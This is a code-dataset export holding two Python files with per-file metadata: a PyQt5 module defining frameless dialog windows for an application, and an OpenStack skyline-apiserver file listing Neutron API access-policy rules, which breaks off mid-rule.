| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
bb1b98d46a9c032c8579fef8065fdc7cbe68c20e
| 4,780
|
py
|
Python
|
annulation.py
|
SoftDevX/MJDB
|
386bbb464fbd24c02f0d87da30e0dd11da65b764
|
[
"MIT"
] | null | null | null |
annulation.py
|
SoftDevX/MJDB
|
386bbb464fbd24c02f0d87da30e0dd11da65b764
|
[
"MIT"
] | null | null | null |
annulation.py
|
SoftDevX/MJDB
|
386bbb464fbd24c02f0d87da30e0dd11da65b764
|
[
"MIT"
] | null | null | null |
from PyQt5 import QtCore
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from motif import Ui_efed
from motif_ import Ui_efed as motif_detail
from motif_ops import Ui_efed as rem_ops
from remarque_ops import Ui_efed as rem_entry
class Annulation(QWidget, Ui_efed):
def __init__(self, parent=None):
super(Annulation, self).__init__(parent)
self.setupUi(self)
self.setWindowTitle('Motif')
self.setWindowIcon(QIcon('Untitled-2-01.ico'))
flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint)
self.setWindowFlags(flags)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground, True)
self.setWindowModality(Qt.ApplicationModal)
self.motif = self.findChild(QTextEdit, 'motif')
self.minimize = self.findChild(QPushButton, 'mini')
self.title = self.findChild(QFrame, 'title_bar')
self.val = self.findChild(QPushButton, 'val')
self.wrong = self.findChild(QLabel, 'wrong')
self.close_btn = self.findChild(QPushButton, 'close_btn')
self.minimize.clicked.connect(lambda: self.showMinimized())
self.close_btn.clicked.connect(lambda: self.close())
def moveWindow(event):
if event.buttons() == Qt.LeftButton:
self.move(self.pos() + event.globalPos() - self.dragPos)
self.dragPos = event.globalPos()
event.accept()
self.title_bar.mouseMoveEvent = moveWindow
def mousePressEvent(self, event):
self.dragPos = event.globalPos()
def keyPressEvent(self, event):
if event.key() == Qt.Key_Return:
self.val.animateClick()
class Motif(QWidget, motif_detail):
def __init__(self, parent=None):
super(Motif, self).__init__(parent)
self.setupUi(self)
flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint)
self.setWindowFlags(flags)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground, True)
self.motif = self.findChild(QTextEdit, 'motif')
self.minimize = self.findChild(QPushButton, 'mini')
self.title = self.findChild(QFrame, 'title_bar')
self.val = self.findChild(QPushButton, 'val')
self.close_btn = self.findChild(QPushButton, 'close_btn')
self.minimize.clicked.connect(lambda: self.showMinimized())
self.close_btn.clicked.connect(lambda: self.close())
def moveWindow(event):
if event.buttons() == Qt.LeftButton:
self.move(self.pos() + event.globalPos() - self.dragPos)
self.dragPos = event.globalPos()
event.accept()
self.title_bar.mouseMoveEvent = moveWindow
def mousePressEvent(self, event):
self.dragPos = event.globalPos()
def keyPressEvent(self, event):
if event.key() == Qt.Key_Return:
self.val.animateClick()
class MotifOps(QWidget, rem_ops):
def __init__(self):
super(MotifOps, self).__init__()
self.setupUi(self)
flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint)
self.setWindowFlags(flags)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground, True)
self.close_btn.clicked.connect(lambda: self.close())
self.mini.clicked.connect(lambda: self.showMinimized())
def moveWindow(event):
if event.buttons() == Qt.LeftButton:
self.move(self.pos() + event.globalPos() - self.dragPos)
self.dragPos = event.globalPos()
event.accept()
self.title_bar.mouseMoveEvent = moveWindow
def mousePressEvent(self, event):
self.dragPos = event.globalPos()
class RemEntry(QWidget, rem_entry):
def __init__(self):
super(RemEntry, self).__init__()
self.setupUi(self)
flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint)
self.setWindowFlags(flags)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground, True)
self.close_btn.clicked.connect(lambda: self.close())
self.mini.clicked.connect(lambda: self.showMinimized())
def moveWindow(event):
if event.buttons() == Qt.LeftButton:
self.move(self.pos() + event.globalPos() - self.dragPos)
self.dragPos = event.globalPos()
event.accept()
self.title_bar.mouseMoveEvent = moveWindow
self.switch = 0
def mousePressEvent(self, event):
self.dragPos = event.globalPos()
def keyPressEvent(self, event):
if event.key() == Qt.Key_Return:
self.val.animateClick()
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
window = MotifOps()
window.show()
sys.exit(app.exec())
| 34.890511
| 72
| 0.647699
| 527
| 4,780
| 5.732448
| 0.170778
| 0.031778
| 0.052963
| 0.063555
| 0.832506
| 0.818603
| 0.773916
| 0.773916
| 0.773916
| 0.773916
| 0
| 0.002193
| 0.23682
| 4,780
| 136
| 73
| 35.147059
| 0.825932
| 0
| 0
| 0.745283
| 0
| 0
| 0.019874
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.141509
| false
| 0
| 0.084906
| 0
| 0.264151
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24c0382861f5a1ca5b21a453667376c562a2d597
| 109,697
|
py
|
Python
|
skyline_apiserver/policy/manager/neutron.py
|
openstack/skyline-apiserver
|
60144767cd5513bd581fbb8eac7791887d5b276f
|
[
"Apache-2.0"
] | null | null | null |
skyline_apiserver/policy/manager/neutron.py
|
openstack/skyline-apiserver
|
60144767cd5513bd581fbb8eac7791887d5b276f
|
[
"Apache-2.0"
] | null | null | null |
skyline_apiserver/policy/manager/neutron.py
|
openstack/skyline-apiserver
|
60144767cd5513bd581fbb8eac7791887d5b276f
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
from . import base
list_rules = (
base.Rule(
name="context_is_admin",
check_str=("role:admin"),
description="Rule for cloud admin access",
),
base.Rule(
name="owner",
check_str=("tenant_id:%(tenant_id)s"),
description="Rule for resource owner access",
),
base.Rule(
name="admin_or_owner",
check_str=("rule:context_is_admin or rule:owner"),
description="Rule for admin or owner access",
),
base.Rule(
name="context_is_advsvc",
check_str=("role:advsvc"),
description="Rule for advsvc role access",
),
base.Rule(
name="admin_or_network_owner",
check_str=("rule:context_is_admin or tenant_id:%(network:tenant_id)s"),
description="Rule for admin or network owner access",
),
base.Rule(
name="admin_owner_or_network_owner",
check_str=("rule:owner or rule:admin_or_network_owner"),
description="Rule for resource owner, admin or network owner access",
),
base.Rule(
name="network_owner",
check_str=("tenant_id:%(network:tenant_id)s"),
description="Rule for network owner access",
),
base.Rule(
name="admin_only",
check_str=("rule:context_is_admin"),
description="Rule for admin-only access",
),
base.Rule(
name="regular_user",
check_str=(""),
description="Rule for regular user access",
),
base.Rule(
name="shared",
check_str=("field:networks:shared=True"),
description="Rule of shared network",
),
base.Rule(
name="default",
check_str=("rule:admin_or_owner"),
description="Default access rule",
),
base.Rule(
name="admin_or_ext_parent_owner",
check_str=("rule:context_is_admin or tenant_id:%(ext_parent:tenant_id)s"),
description="Rule for common parent owner check",
),
base.Rule(
name="ext_parent_owner",
check_str=("tenant_id:%(ext_parent:tenant_id)s"),
description="Rule for common parent owner check",
),
base.Rule(
name="sg_owner",
check_str=("tenant_id:%(security_group:tenant_id)s"),
description="Rule for security group owner access",
),
base.Rule(
name="shared_address_groups",
check_str=("field:address_groups:shared=True"),
description="Definition of a shared address group",
),
base.Rule(
name="shared_address_scopes",
check_str=("field:address_scopes:shared=True"),
description="Definition of a shared address scope",
),
base.Rule(
name="get_flavor_service_profile",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="Get a flavor associated with a given service profiles. There is no corresponding GET operations in API currently. This rule is currently referred only in the DELETE of flavor_service_profile.",
),
base.Rule(
name="external",
check_str=("field:networks:router:external=True"),
description="Definition of an external network",
),
base.Rule(
name="network_device",
check_str=("field:port:device_owner=~^network:"),
description="Definition of port with network device_owner",
),
base.Rule(
name="admin_or_data_plane_int",
check_str=("rule:context_is_admin or role:data_plane_integrator"),
description="Rule for data plane integration",
),
base.Rule(
name="restrict_wildcard",
check_str=("(not field:rbac_policy:target_tenant=*) or rule:admin_only"),
description="Definition of a wildcard target_tenant",
),
base.Rule(
name="admin_or_sg_owner",
check_str=("rule:context_is_admin or tenant_id:%(security_group:tenant_id)s"),
description="Rule for admin or security group owner access",
),
base.Rule(
name="admin_owner_or_sg_owner",
check_str=("rule:owner or rule:admin_or_sg_owner"),
description="Rule for resource owner, admin or security group owner access",
),
base.Rule(
name="shared_subnetpools",
check_str=("field:subnetpools:shared=True"),
description="Definition of a shared subnetpool",
),
base.APIRule(
name="get_address_group",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:shared_address_groups"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get an address group",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/address-groups"},
{"method": "GET", "path": "/address-groups/{id}"},
],
),
base.APIRule(
name="create_address_scope",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create an address scope",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/address-scopes"}],
),
base.APIRule(
name="create_address_scope:shared",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a shared address scope",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/address-scopes"}],
),
base.APIRule(
name="get_address_scope",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:shared_address_scopes"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get an address scope",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/address-scopes"},
{"method": "GET", "path": "/address-scopes/{id}"},
],
),
base.APIRule(
name="update_address_scope",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update an address scope",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/address-scopes/{id}"}],
),
base.APIRule(
name="update_address_scope:shared",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``shared`` attribute of an address scope",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/address-scopes/{id}"}],
),
base.APIRule(
name="delete_address_scope",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete an address scope",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/address-scopes/{id}"}],
),
base.APIRule(
name="get_agent",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get an agent",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/agents"},
{"method": "GET", "path": "/agents/{id}"},
],
),
base.APIRule(
name="update_agent",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update an agent",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/agents/{id}"}],
),
base.APIRule(
name="delete_agent",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete an agent",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/agents/{id}"}],
),
base.APIRule(
name="create_dhcp-network",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Add a network to a DHCP agent",
scope_types=["system"],
operations=[{"method": "POST", "path": "/agents/{agent_id}/dhcp-networks"}],
),
base.APIRule(
name="get_dhcp-networks",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="List networks on a DHCP agent",
scope_types=["system"],
operations=[{"method": "GET", "path": "/agents/{agent_id}/dhcp-networks"}],
),
base.APIRule(
name="delete_dhcp-network",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Remove a network from a DHCP agent",
scope_types=["system"],
operations=[
{"method": "DELETE", "path": "/agents/{agent_id}/dhcp-networks/{network_id}"},
],
),
base.APIRule(
name="create_l3-router",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Add a router to an L3 agent",
scope_types=["system"],
operations=[{"method": "POST", "path": "/agents/{agent_id}/l3-routers"}],
),
base.APIRule(
name="get_l3-routers",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="List routers on an L3 agent",
scope_types=["system"],
operations=[{"method": "GET", "path": "/agents/{agent_id}/l3-routers"}],
),
base.APIRule(
name="delete_l3-router",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Remove a router from an L3 agent",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/agents/{agent_id}/l3-routers/{router_id}"}],
),
base.APIRule(
name="get_dhcp-agents",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="List DHCP agents hosting a network",
scope_types=["system"],
operations=[{"method": "GET", "path": "/networks/{network_id}/dhcp-agents"}],
),
base.APIRule(
name="get_l3-agents",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="List L3 agents hosting a router",
scope_types=["system"],
operations=[{"method": "GET", "path": "/routers/{router_id}/l3-agents"}],
),
base.APIRule(
name="get_auto_allocated_topology",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a project's auto-allocated topology",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/auto-allocated-topology/{project_id}"}],
),
base.APIRule(
name="delete_auto_allocated_topology",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a project's auto-allocated topology",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/auto-allocated-topology/{project_id}"}],
),
base.APIRule(
name="get_availability_zone",
check_str=("role:reader and system_scope:all"),
basic_check_str=("@"),
description="List availability zones",
scope_types=["system"],
operations=[{"method": "GET", "path": "/availability_zones"}],
),
base.APIRule(
name="create_flavor",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a flavor",
scope_types=["system"],
operations=[{"method": "POST", "path": "/flavors"}],
),
base.APIRule(
name="get_flavor",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a flavor",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/flavors"},
{"method": "GET", "path": "/flavors/{id}"},
],
),
base.APIRule(
name="update_flavor",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a flavor",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/flavors/{id}"}],
),
base.APIRule(
name="delete_flavor",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a flavor",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/flavors/{id}"}],
),
base.APIRule(
name="create_service_profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a service profile",
scope_types=["system"],
operations=[{"method": "POST", "path": "/service_profiles"}],
),
base.APIRule(
name="get_service_profile",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a service profile",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/service_profiles"},
{"method": "GET", "path": "/service_profiles/{id}"},
],
),
base.APIRule(
name="update_service_profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a service profile",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/service_profiles/{id}"}],
),
base.APIRule(
name="delete_service_profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a service profile",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/service_profiles/{id}"}],
),
base.APIRule(
name="create_flavor_service_profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Associate a flavor with a service profile",
scope_types=["system"],
operations=[{"method": "POST", "path": "/flavors/{flavor_id}/service_profiles"}],
),
base.APIRule(
name="delete_flavor_service_profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Disassociate a flavor with a service profile",
scope_types=["system"],
operations=[
{"method": "DELETE", "path": "/flavors/{flavor_id}/service_profiles/{profile_id}"},
],
),
base.APIRule(
name="create_floatingip",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a floating IP",
scope_types=["project"],
operations=[{"method": "POST", "path": "/floatingips"}],
),
base.APIRule(
name="create_floatingip:floating_ip_address",
check_str=("role:admin and system_scope:all"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a floating IP with a specific IP address",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/floatingips"}],
),
base.APIRule(
name="get_floatingip",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a floating IP",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/floatingips"},
{"method": "GET", "path": "/floatingips/{id}"},
],
),
base.APIRule(
name="update_floatingip",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a floating IP",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/floatingips/{id}"}],
),
base.APIRule(
name="delete_floatingip",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a floating IP",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/floatingips/{id}"}],
),
base.APIRule(
name="get_floatingip_pool",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get floating IP pools",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/floatingip_pools"}],
),
base.APIRule(
name="create_floatingip_port_forwarding",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a floating IP port forwarding",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/floatingips/{floatingip_id}/port_forwardings"}],
),
base.APIRule(
name="get_floatingip_port_forwarding",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a floating IP port forwarding",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/floatingips/{floatingip_id}/port_forwardings"},
{
"method": "GET",
"path": "/floatingips/{floatingip_id}/port_forwardings/{port_forwarding_id}",
},
],
),
base.APIRule(
name="update_floatingip_port_forwarding",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a floating IP port forwarding",
scope_types=["system", "project"],
operations=[
{
"method": "PUT",
"path": "/floatingips/{floatingip_id}/port_forwardings/{port_forwarding_id}",
},
],
),
base.APIRule(
name="delete_floatingip_port_forwarding",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a floating IP port forwarding",
scope_types=["system", "project"],
operations=[
{
"method": "DELETE",
"path": "/floatingips/{floatingip_id}/port_forwardings/{port_forwarding_id}",
},
],
),
base.APIRule(
name="create_router_conntrack_helper",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a router conntrack helper",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/routers/{router_id}/conntrack_helpers"}],
),
base.APIRule(
name="get_router_conntrack_helper",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a router conntrack helper",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/routers/{router_id}/conntrack_helpers"},
{
"method": "GET",
"path": "/routers/{router_id}/conntrack_helpers/{conntrack_helper_id}",
},
],
),
base.APIRule(
name="update_router_conntrack_helper",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a router conntrack helper",
scope_types=["system", "project"],
operations=[
{
"method": "PUT",
"path": "/routers/{router_id}/conntrack_helpers/{conntrack_helper_id}",
},
],
),
base.APIRule(
name="delete_router_conntrack_helper",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a router conntrack helper",
scope_types=["system", "project"],
operations=[
{
"method": "DELETE",
"path": "/routers/{router_id}/conntrack_helpers/{conntrack_helper_id}",
},
],
),
base.APIRule(
name="get_loggable_resource",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get loggable resources",
scope_types=["system"],
operations=[{"method": "GET", "path": "/log/loggable-resources"}],
),
base.APIRule(
name="create_log",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a network log",
scope_types=["system"],
operations=[{"method": "POST", "path": "/log/logs"}],
),
base.APIRule(
name="get_log",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a network log",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/log/logs"},
{"method": "GET", "path": "/log/logs/{id}"},
],
),
base.APIRule(
name="update_log",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a network log",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/log/logs/{id}"}],
),
base.APIRule(
name="delete_log",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a network log",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/log/logs/{id}"}],
),
base.APIRule(
name="create_metering_label",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a metering label",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/metering/metering-labels"}],
),
base.APIRule(
name="get_metering_label",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a metering label",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/metering/metering-labels"},
{"method": "GET", "path": "/metering/metering-labels/{id}"},
],
),
base.APIRule(
name="delete_metering_label",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a metering label",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/metering/metering-labels/{id}"}],
),
base.APIRule(
name="create_metering_label_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a metering label rule",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/metering/metering-label-rules"}],
),
base.APIRule(
name="get_metering_label_rule",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a metering label rule",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/metering/metering-label-rules"},
{"method": "GET", "path": "/metering/metering-label-rules/{id}"},
],
),
base.APIRule(
name="delete_metering_label_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a metering label rule",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/metering/metering-label-rules/{id}"}],
),
base.APIRule(
name="create_network",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a network",
scope_types=["project"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:shared",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a shared network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:router:external",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create an external network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:is_default",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``is_default`` attribute when creating a network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:port_security_enabled",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``port_security_enabled`` attribute when creating a network",
scope_types=["project"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:segments",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``segments`` attribute when creating a network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:provider:network_type",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``provider:network_type`` when creating a network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:provider:physical_network",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``provider:physical_network`` when creating a network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:provider:segmentation_id",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``provider:segmentation_id`` when creating a network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="get_network",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:shared or rule:external or rule:context_is_advsvc"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a network",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/networks"},
{"method": "GET", "path": "/networks/{id}"},
],
),
base.APIRule(
name="get_network:router:external",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="Get ``router:external`` attribute of a network",
scope_types=["project"],
operations=[
{"method": "GET", "path": "/networks"},
{"method": "GET", "path": "/networks/{id}"},
],
),
base.APIRule(
name="get_network:segments",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``segments`` attribute of a network",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/networks"},
{"method": "GET", "path": "/networks/{id}"},
],
),
base.APIRule(
name="get_network:provider:network_type",
check_str=("role:reader and system_scope:all"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get ``provider:network_type`` attribute of a network",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/networks"},
{"method": "GET", "path": "/networks/{id}"},
],
),
base.APIRule(
name="get_network:provider:physical_network",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``provider:physical_network`` attribute of a network",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/networks"},
{"method": "GET", "path": "/networks/{id}"},
],
),
base.APIRule(
name="get_network:provider:segmentation_id",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``provider:segmentation_id`` attribute of a network",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/networks"},
{"method": "GET", "path": "/networks/{id}"},
],
),
base.APIRule(
name="update_network",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a network",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:segments",
